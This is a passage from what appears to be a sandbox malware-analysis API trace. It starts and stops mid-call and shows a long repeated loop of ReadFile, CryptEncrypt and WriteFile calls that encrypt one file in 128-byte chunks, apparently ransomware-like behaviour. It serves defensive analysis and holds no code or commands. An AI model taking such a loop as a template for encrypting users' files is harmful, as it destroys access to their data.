lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.660] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.660] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.660] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.660] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.660] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.660] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.660] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.660] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.661] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.661] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.661] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.661] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.661] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.661] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.661] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.662] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.662] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.662] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.662] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.662] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.662] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.662] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.662] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.662] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.663] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.663] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.663] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.663] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.663] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.663] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.663] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.663] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.663] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.664] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.664] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.664] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.664] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.664] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.664] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.664] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.665] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.665] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.665] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.665] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.665] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.665] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.665] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.665] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.665] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.665] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.665] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.665] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.665] ReadFile (in: hFile=0xd8, 